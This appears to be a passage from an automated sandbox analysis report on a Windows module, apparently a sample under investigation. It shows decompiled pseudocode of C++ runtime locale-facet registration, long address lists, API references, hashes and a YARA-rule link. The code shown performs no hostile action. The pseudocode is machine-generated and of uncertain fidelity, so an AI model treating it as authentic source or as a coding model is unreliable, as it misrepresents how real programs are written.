																																																				E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t637, _t855, _t876, 0x14);
																																																				E6DDD6653(_t902 - 0x14, 0);
																																																				_t877 =  *0x6de96dfc; // 0x0
																																																				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																				 *(_t902 - 0x10) = _t877;
																																																				_t501 = E6DDB161C(0x6de96da8);
																																																				_t752 =  *((intOrPtr*)(_t902 + 8));
																																																				_t856 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t501);
																																																				__eflags = _t856;
																																																				if(_t856 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t902 - 0x14);
																																																					return E6DDF0075(_t856);
																																																				} else {
																																																					__eflags = _t877;
																																																					if(_t877 == 0) {
																																																						_push( *((intOrPtr*)(_t902 + 8)));
																																																						_push(_t902 - 0x10);
																																																						__eflags = E6DDE14EC(_t637, _t752, _t838, _t856, _t877) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t902 - 0x20);
																																																							E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t637, _t856, _t877, 0x14);
																																																							E6DDD6653(_t902 - 0x14, 0);
																																																							_t878 =  *0x6de96dcc; // 0x0
																																																							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																							 *(_t902 - 0x10) = _t878;
																																																							_t514 = E6DDB161C(0x6de96d80);
																																																							_t759 =  *((intOrPtr*)(_t902 + 8));
																																																							_t857 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t514);
																																																							__eflags = _t857;
																																																							if(_t857 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t902 - 0x14);
																																																								return E6DDF0075(_t857);
																																																							} else {
																																																								__eflags = _t878;
																																																								if(_t878 == 0) {
																																																									_push( *((intOrPtr*)(_t902 + 8)));
																																																									_push(_t902 - 0x10);
																																																									__eflags = E6DDE1558(_t637, _t759, _t838, _t857, _t878) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6DDB1438(_t902 - 0x20);
																																																										E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de383cf, _t637, _t857, _t878, 0x14);
																																																										E6DDD6653(_t902 - 0x14, 0);
																																																										_t879 =  *0x6de96e00; // 0x0
																																																										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																										 *(_t902 - 0x10) = _t879;
																																																										_t527 = E6DDB161C(0x6de96dac);
																																																										_t766 =  *((intOrPtr*)(_t902 + 8));
																																																										_t858 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t527);
																																																										__eflags = _t858;
																																																										if(_t858 != 0) {
																																																											L131:
																																																											E6DDD66BA(_t902 - 0x14);
																																																											return E6DDF0075(_t858);
																																																										} else {
																																																											__eflags = _t879;
																																																											if(_t879 == 0) {
																																																												_push( *((intOrPtr*)(_t902 + 8)));
																																																												_push(_t902 - 0x10);
																																																												__eflags = E6DDE15C4(_t637, _t766, _t838, _t858, _t879) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													E6DDB1438(_t902 - 0x20);
																																																													E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																													asm("int3");
																																																													E6DDF00AC(0x6de383cf, _t637, _t858, _t879, 0x14);
																																																													E6DDD6653(_t902 - 0x14, 0);
																																																													_t880 =  *0x6de96dd0; // 0x0
																																																													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																													 *(_t902 - 0x10) = _t880;
																																																													_t540 = E6DDB161C(0x6de96d60);
																																																													_t773 =  *((intOrPtr*)(_t902 + 8));
																																																													_t859 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t540);
																																																													__eflags = _t859;
																																																													if(_t859 != 0) {
																																																														L138:
																																																														E6DDD66BA(_t902 - 0x14);
																																																														return E6DDF0075(_t859);
																																																													} else {
																																																														__eflags = _t880;
																																																														if(_t880 == 0) {
																																																															_push( *((intOrPtr*)(_t902 + 8)));
																																																															_push(_t902 - 0x10);
																																																															__eflags = E6DDE162A(_t637, _t773, _t838, _t859, _t880) - 0xffffffff;
																																																															if(__eflags == 0) {
																																																																_t777 = _t902 - 0x20;
																																																																E6DDB1438(_t777);
																																																																E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																																asm("int3");
																																																																E6DDF00AC(0x6de3851f, _t637, _t859, _t880, 4);
																																																																_t881 = _t777;
																																																																 *(_t902 - 0x10) = _t881;
																																																																 *((intOrPtr*)(_t881 + 4)) =  *((intOrPtr*)(_t902 + 0xc));
																																																																_push( *((intOrPtr*)(_t902 + 0x14)));
																																																																_t287 = _t902 - 4;
																																																																 *_t287 =  *(_t902 - 4) & 0x00000000;
																																																																__eflags =  *_t287;
																																																																 *_t881 = 0x6de3c0c4;
																																																																 *((char*)(_t881 + 0x28)) =  *((intOrPtr*)(_t902 + 0x10));
																																																																E6DDE542F(_t637, _t777, _t838, _t859, _t881,  *_t287);
																																																																return E6DDF0075(_t881,  *((intOrPtr*)(_t902 + 8)));
																																																															} else {
																																																																_t859 =  *(_t902 - 0x10);
																																																																 *(_t902 - 0x10) = _t859;
																																																																 *(_t902 - 4) = 1;
																																																																E6DDD6FD3(__eflags, _t859);
																																																																 *0x6de3a26c();
																																																																 *((intOrPtr*)( *((intOrPtr*)( *_t859 + 4))))();
																																																																 *0x6de96dd0 = _t859;
																																																																goto L138;
																																																															}
																																																														} else {
																																																															_t859 = _t880;
																																																															goto L138;
																																																														}
																																																													}
																																																												} else {
																																																													_t858 =  *(_t902 - 0x10);
																																																													 *(_t902 - 0x10) = _t858;
																																																													 *(_t902 - 4) = 1;
																																																													E6DDD6FD3(__eflags, _t858);
																																																													 *0x6de3a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t858 + 4))))();
																																																													 *0x6de96e00 = _t858;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t858 = _t879;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t857 =  *(_t902 - 0x10);
																																																										 *(_t902 - 0x10) = _t857;
																																																										 *(_t902 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t857);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t857 + 4))))();
																																																										 *0x6de96dcc = _t857;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t857 = _t878;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t856 =  *(_t902 - 0x10);
																																																							 *(_t902 - 0x10) = _t856;
																																																							 *(_t902 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t856);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t856 + 4))))();
																																																							 *0x6de96dfc = _t856;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t856 = _t877;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t855 =  *(_t902 - 0x10);
																																																				 *(_t902 - 0x10) = _t855;
																																																				 *(_t902 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t855);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t855 + 4))))();
																																																				 *0x6de96de0 = _t855;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t855 = _t876;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t854 =  *(_t902 - 0x10);
																																																	 *(_t902 - 0x10) = _t854;
																																																	 *(_t902 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t854);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t854 + 4))))();
																																																	 *0x6de96ddc = _t854;
																																																	goto L103;
																																																}
																																															} else {
																																																_t854 = _t875;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t853 =  *(_t902 - 0x10);
																																														 *(_t902 - 0x10) = _t853;
																																														 *(_t902 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t853);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t853 + 4))))();
																																														 *0x6de96db0 = _t853;
																																														goto L96;
																																													}
																																												} else {
																																													_t853 = _t874;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t852 =  *(_t902 - 0x10);
																																											 *(_t902 - 0x10) = _t852;
																																											 *(_t902 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t852);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t852 + 4))))();
																																											 *0x6de96dd8 = _t852;
																																											goto L89;
																																										}
																																									} else {
																																										_t852 = _t873;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t851 =  *(_t902 - 0x10);
																																								 *(_t902 - 0x10) = _t851;
																																								 *(_t902 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t851);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t851 + 4))))();
																																								 *0x6de96dc4 = _t851;
																																								goto L82;
																																							}
																																						} else {
																																							_t851 = _t872;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t850 =  *(_t902 - 0x10);
																																					 *(_t902 - 0x10) = _t850;
																																					 *(_t902 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t850);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t850 + 4))))();
																																					 *0x6de96dc8 = _t850;
																																					goto L75;
																																				}
																																			} else {
																																				_t850 = _t871;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t849 =  *(_t902 - 0x10);
																																		 *(_t902 - 0x10) = _t849;
																																		 *(_t902 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t849);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t849 + 4))))();
																																		 *0x6de96df4 = _t849;
																																		goto L68;
																																	}
																																} else {
																																	_t849 = _t870;
																																	goto L68;
																																}
																															}
																														} else {
																															_t848 =  *(_t902 - 0x10);
																															 *(_t902 - 0x10) = _t848;
																															 *(_t902 - 4) = 1;
																															E6DDD6FD3(__eflags, _t848);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t848 + 4))))();
																															 *0x6de96df8 = _t848;
																															goto L61;
																														}
																													} else {
																														_t848 = _t869;
																														goto L61;
																													}
																												}
																											} else {
																												_t847 =  *(_t902 - 0x10);
																												 *(_t902 - 0x10) = _t847;
																												 *(_t902 - 4) = 1;
																												E6DDD6FD3(__eflags, _t847);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t847 + 4))))();
																												 *0x6de96dc0 = _t847;
																												goto L54;
																											}
																										} else {
																											_t847 = _t868;
																											goto L54;
																										}
																									}
																								} else {
																									_t846 =  *(_t902 - 0x10);
																									 *(_t902 - 0x10) = _t846;
																									 *(_t902 - 4) = 1;
																									E6DDD6FD3(__eflags, _t846);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t846 + 4))))();
																									 *0x6de96df0 = _t846;
																									goto L47;
																								}
																							} else {
																								_t846 = _t867;
																								goto L47;
																							}
																						}
																					} else {
																						_t845 =  *(_t902 - 0x10);
																						 *(_t902 - 0x10) = _t845;
																						 *(_t902 - 4) = 1;
																						E6DDD6FD3(__eflags, _t845);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t845 + 4))))();
																						 *0x6de96dbc = _t845;
																						goto L40;
																					}
																				} else {
																					_t845 = _t866;
																					goto L40;
																				}
																			}
																		} else {
																			_t844 =  *(_t902 - 0x10);
																			 *(_t902 - 0x10) = _t844;
																			 *(_t902 - 4) = 1;
																			E6DDD6FD3(__eflags, _t844);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t844 + 4))))();
																			 *0x6de96dec = _t844;
																			goto L33;
																		}
																	} else {
																		_t844 = _t865;
																		goto L33;
																	}
																}
															} else {
																_t843 =  *(_t902 - 0x10);
																 *(_t902 - 0x10) = _t843;
																 *(_t902 - 4) = 1;
																E6DDD6FD3(__eflags, _t843);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t843 + 4))))();
																 *0x6de96db8 = _t843;
																goto L26;
															}
														} else {
															_t843 = _t864;
															goto L26;
														}
													}
												} else {
													_t842 =  *(_t902 - 0x10);
													 *(_t902 - 0x10) = _t842;
													 *(_t902 - 4) = 1;
													E6DDD6FD3(__eflags, _t842);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t842 + 4))))();
													 *0x6de96de8 = _t842;
													goto L19;
												}
											} else {
												_t842 = _t863;
												goto L19;
											}
										}
									} else {
										_t841 =  *(_t902 - 0x10);
										 *(_t902 - 0x10) = _t841;
										 *(_t902 - 4) = 1;
										E6DDD6FD3(__eflags, _t841);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t841 + 4))))();
										 *0x6de96dd4 = _t841;
										goto L12;
									}
								} else {
									_t841 = _t862;
									goto L12;
								}
							}
						} else {
							_t840 =  *(_t902 - 0x10);
							 *(_t902 - 0x10) = _t840;
							 *(_t902 - 4) = 1;
							E6DDD6FD3(__eflags, _t840);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t840 + 4))))();
							 *0x6de96db4 = _t840;
							goto L5;
						}
					} else {
						_t840 = _t861;
						goto L5;
					}
				}
			}

0x6dddf037
0x6dddf037
0x6dddf03e
0x6dddf048
0x6dddf04d
0x6dddf058
0x6dddf05c
0x6dddf05f
0x6dddf064
0x6dddf068
0x6dddf06d
0x6dddf071
0x6dddf0b6
0x6dddf0b9
0x6dddf0c5
0x6dddf073
0x6dddf075
0x6dddf07b
0x6dddf081
0x6dddf089
0x6dddf08c
0x6dddf0c9
0x6dddf0d7
0x6dddf0dc
0x6dddf0e4
0x6dddf0ee
0x6dddf0f3
0x6dddf0fe
0x6dddf102
0x6dddf105
0x6dddf10a
0x6dddf113
0x6dddf115
0x6dddf117
0x6dddf15c
0x6dddf15f
0x6dddf16b
0x6dddf119
0x6dddf119
0x6dddf11b
0x6dddf121
0x6dddf127
0x6dddf12f
0x6dddf132
0x6dddf16f
0x6dddf17d
0x6dddf182
0x6dddf18a
0x6dddf194
0x6dddf199
0x6dddf1a4
0x6dddf1a8
0x6dddf1ab
0x6dddf1b0
0x6dddf1b9
0x6dddf1bb
0x6dddf1bd
0x6dddf202
0x6dddf205
0x6dddf211
0x6dddf1bf
0x6dddf1bf
0x6dddf1c1
0x6dddf1c7
0x6dddf1cd
0x6dddf1d5
0x6dddf1d8
0x6dddf215
0x6dddf223
0x6dddf228
0x6dddf230
0x6dddf23a
0x6dddf23f
0x6dddf24a
0x6dddf24e
0x6dddf251
0x6dddf256
0x6dddf25f
0x6dddf261
0x6dddf263
0x6dddf2a8
0x6dddf2ab
0x6dddf2b7
0x6dddf265
0x6dddf265
0x6dddf267
0x6dddf26d
0x6dddf273
0x6dddf27b
0x6dddf27e
0x6dddf2bb
0x6dddf2c9
0x6dddf2ce
0x6dddf2d6
0x6dddf2e0
0x6dddf2e5
0x6dddf2f0
0x6dddf2f4
0x6dddf2f7
0x6dddf2fc
0x6dddf305
0x6dddf307
0x6dddf309
0x6dddf34e
0x6dddf351
0x6dddf35d
0x6dddf30b
0x6dddf30b
0x6dddf30d
0x6dddf313
0x6dddf319
0x6dddf321
0x6dddf324
0x6dddf361
0x6dddf36f
0x6dddf374
0x6dddf37c
0x6dddf386
0x6dddf38b
0x6dddf396
0x6dddf39a
0x6dddf39d
0x6dddf3a2
0x6dddf3ab
0x6dddf3ad
0x6dddf3af
0x6dddf3f4
0x6dddf3f7
0x6dddf403
0x6dddf3b1
0x6dddf3b1
0x6dddf3b3
0x6dddf3b9
0x6dddf3bf
0x6dddf3c7
0x6dddf3ca
0x6dddf407
0x6dddf415
0x6dddf41a
0x6dddf422
0x6dddf42c
0x6dddf431
0x6dddf43c
0x6dddf440
0x6dddf443
0x6dddf448
0x6dddf451
0x6dddf453
0x6dddf455
0x6dddf49a
0x6dddf49d
0x6dddf4a9
0x6dddf457
0x6dddf457
0x6dddf459
0x6dddf45f
0x6dddf465
0x6dddf46d
0x6dddf470
0x6dddf4ad
0x6dddf4bb
0x6dddf4c0
0x6dddf4c8
0x6dddf4d2
0x6dddf4d7
0x6dddf4e2
0x6dddf4e6
0x6dddf4e9
0x6dddf4ee
0x6dddf4f7
0x6dddf4f9
0x6dddf4fb
0x6dddf540
0x6dddf543
0x6dddf54f
0x6dddf4fd
0x6dddf4fd
0x6dddf4ff
0x6dddf505
0x6dddf50b
0x6dddf513
0x6dddf516
0x6dddf553
0x6dddf561
0x6dddf566
0x6dddf56e
0x6dddf578
0x6dddf57d
0x6dddf588
0x6dddf58c
0x6dddf58f
0x6dddf594
0x6dddf59d
0x6dddf59f
0x6dddf5a1
0x6dddf5e6
0x6dddf5e9
0x6dddf5f5
0x6dddf5a3
0x6dddf5a3
0x6dddf5a5
0x6dddf5ab
0x6dddf5b1
0x6dddf5b9
0x6dddf5bc
0x6dddf5f9
0x6dddf607
0x6dddf60c
0x6dddf614
0x6dddf61e
0x6dddf623
0x6dddf62e
0x6dddf632
0x6dddf635
0x6dddf63a
0x6dddf643
0x6dddf645
0x6dddf647
0x6dddf68c
0x6dddf68f
0x6dddf69b
0x6dddf649
0x6dddf649
0x6dddf64b
0x6dddf651
0x6dddf657
0x6dddf65f
0x6dddf662
0x6dddf69f
0x6dddf6ad
0x6dddf6b2
0x6dddf6ba
0x6dddf6c4
0x6dddf6c9
0x6dddf6d4
0x6dddf6d8
0x6dddf6db
0x6dddf6e0
0x6dddf6e9
0x6dddf6eb
0x6dddf6ed
0x6dddf732
0x6dddf735
0x6dddf741
0x6dddf6ef
0x6dddf6ef
0x6dddf6f1
0x6dddf6f7
0x6dddf6fd
0x6dddf705
0x6dddf708
0x6dddf745
0x6dddf753
0x6dddf758
0x6dddf760
0x6dddf76a
0x6dddf76f
0x6dddf77a
0x6dddf77e
0x6dddf781
0x6dddf786
0x6dddf78f
0x6dddf791
0x6dddf793
0x6dddf7d8
0x6dddf7db
0x6dddf7e7
0x6dddf795
0x6dddf795
0x6dddf797
0x6dddf79d
0x6dddf7a3
0x6dddf7ab
0x6dddf7ae
0x6dddf7eb
0x6dddf7f9
0x6dddf7fe
0x6dddf806
0x6dddf810
0x6dddf815
0x6dddf820
0x6dddf824
0x6dddf827
0x6dddf82c
0x6dddf835
0x6dddf837
0x6dddf839
0x6dddf87e
0x6dddf881
0x6dddf88d
0x6dddf83b
0x6dddf83b
0x6dddf83d
0x6dddf843
0x6dddf849
0x6dddf851
0x6dddf854
0x6dddf891
0x6dddf89f
0x6dddf8a4
0x6dddf8ac
0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8db
0x6dddf8dd
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797
0x6dddf70a
0x6dddf70a
0x6dddf70d
0x6dddf711
0x6dddf715
0x6dddf722
0x6dddf72a
0x6dddf72c
0x00000000
0x6dddf72c
0x6dddf6f3
0x6dddf6f3
0x00000000
0x6dddf6f3
0x6dddf6f1
0x6dddf664
0x6dddf664
0x6dddf667
0x6dddf66b
0x6dddf66f
0x6dddf67c
0x6dddf684
0x6dddf686
0x00000000
0x6dddf686
0x6dddf64d
0x6dddf64d
0x00000000
0x6dddf64d
0x6dddf64b
0x6dddf5be
0x6dddf5be
0x6dddf5c1
0x6dddf5c5
0x6dddf5c9
0x6dddf5d6
0x6dddf5de
0x6dddf5e0
0x00000000
0x6dddf5e0
0x6dddf5a7
0x6dddf5a7
0x00000000
0x6dddf5a7
0x6dddf5a5
0x6dddf518
0x6dddf518
0x6dddf51b
0x6dddf51f
0x6dddf523
0x6dddf530
0x6dddf538
0x6dddf53a
0x00000000
0x6dddf53a
0x6dddf501
0x6dddf501
0x00000000
0x6dddf501
0x6dddf4ff
0x6dddf472
0x6dddf472
0x6dddf475
0x6dddf479
0x6dddf47d
0x6dddf48a
0x6dddf492
0x6dddf494
0x00000000
0x6dddf494
0x6dddf45b
0x6dddf45b
0x00000000
0x6dddf45b
0x6dddf459
0x6dddf3cc
0x6dddf3cc
0x6dddf3cf
0x6dddf3d3
0x6dddf3d7
0x6dddf3e4
0x6dddf3ec
0x6dddf3ee
0x00000000
0x6dddf3ee
0x6dddf3b5
0x6dddf3b5
0x00000000
0x6dddf3b5
0x6dddf3b3
0x6dddf326
0x6dddf326
0x6dddf329
0x6dddf32d
0x6dddf331
0x6dddf33e
0x6dddf346
0x6dddf348
0x00000000
0x6dddf348
0x6dddf30f
0x6dddf30f
0x00000000
0x6dddf30f
0x6dddf30d
0x6dddf280
0x6dddf280
0x6dddf283
0x6dddf287
0x6dddf28b
0x6dddf298
0x6dddf2a0
0x6dddf2a2
0x00000000
0x6dddf2a2
0x6dddf269
0x6dddf269
0x00000000
0x6dddf269
0x6dddf267
0x6dddf1da
0x6dddf1da
0x6dddf1dd
0x6dddf1e1
0x6dddf1e5
0x6dddf1f2
0x6dddf1fa
0x6dddf1fc
0x00000000
0x6dddf1fc
0x6dddf1c3
0x6dddf1c3
0x00000000
0x6dddf1c3
0x6dddf1c1
0x6dddf134
0x6dddf134
0x6dddf137
0x6dddf13b
0x6dddf13f
0x6dddf14c
0x6dddf154
0x6dddf156
0x00000000
0x6dddf156
0x6dddf11d
0x6dddf11d
0x00000000
0x6dddf11d
0x6dddf11b
0x6dddf08e
0x6dddf08e
0x6dddf091
0x6dddf095
0x6dddf099
0x6dddf0a6
0x6dddf0ae
0x6dddf0b0
0x00000000
0x6dddf0b0
0x6dddf077
0x6dddf077
0x00000000
0x6dddf077
0x6dddf075

APIs

__EH_prolog3.LIBCMT ref: 6DDDF03E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF048
int.LIBCPMT ref: 6DDDF05F

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

collate.LIBCPMT ref: 6DDDF082
std::_Facet_Register.LIBCPMT ref: 6DDDF099
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF0B9
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF0D7

Strings

hmm, xrefs: 6DDDF053

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID: hmm
API String ID: 2363045490-380746299
Opcode ID: a6a72c08aca1b97b7a803e36dcce9ec86645bb9cbcfdf25329adfd53ad0c3427
Instruction ID: 116d0f0a26a9bc06059bf3de1f7f852bc0d449ff607af5d545ac86e01f110632
Opcode Fuzzy Hash: a6a72c08aca1b97b7a803e36dcce9ec86645bb9cbcfdf25329adfd53ad0c3427
Instruction Fuzzy Hash: 8411C276849519DBCF01FB64C840BFDB7B5AF94318F260009F511AB294DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
